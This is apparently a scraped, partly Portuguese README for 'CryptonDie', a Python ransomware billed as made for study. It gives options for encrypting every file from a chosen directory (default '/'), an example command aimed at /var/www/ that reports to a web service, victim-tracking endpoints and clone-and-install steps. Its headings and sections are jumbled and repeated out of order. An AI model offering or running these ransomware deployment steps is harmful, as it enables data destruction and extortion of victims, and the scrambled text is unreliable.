
O CryptonDie é um ransomware desenvolvido para fins de estudo.
Opções
--key key used to encrypt and decrypt files, default is random string(recommended) --dir Home directory for the attack, default is / --encrypt Encrypt all files --decrypt Decrypt all files --verbose Active verbose mode, default is False Example: python3 cryptondie.py --web-service http://127.0.0.1:5000 --dir /var/www/ --encrypt --verbose
Pontos de extremidade de serviço da Web
--key key used to encrypt and decrypt files, default is random string(recommended)
--dir Home directory for the attack, default is /
--encrypt Encrypt all files
--decrypt Decrypt all files
--verbose Active verbose mode, default is False
Example:
python3 cryptondie.py --web-service http://127.0.0.1:5000 --dir /var/www/ --encrypt --verbose
Como executar essa merda?
Repositório de clonagem
GET - /targets - list all targets (returns in JSON format)
GET - /targets/<target_id> - list one target by id (returns in JSON format)
POST - /target/<target_id> - create new target
Requisitos de instalação
git clone https://github.com/zer0dx/cryptondie
Executando serviço da web
pip3 install -r requirements.txt
Executando no Docker
cd cryptondie/discovery
python3 service_discovery.py
qual criptografia é implementada?
Advanced Encryption Standard
Contato
[+] Telegram: @zer0dx [+] Github: https://github.com/zer0dx [+] Twitter: https://twitter.com/zer0dxx [+] Blog: https://zer0dx.github.io
o caos é ordem ainda não decifrado.

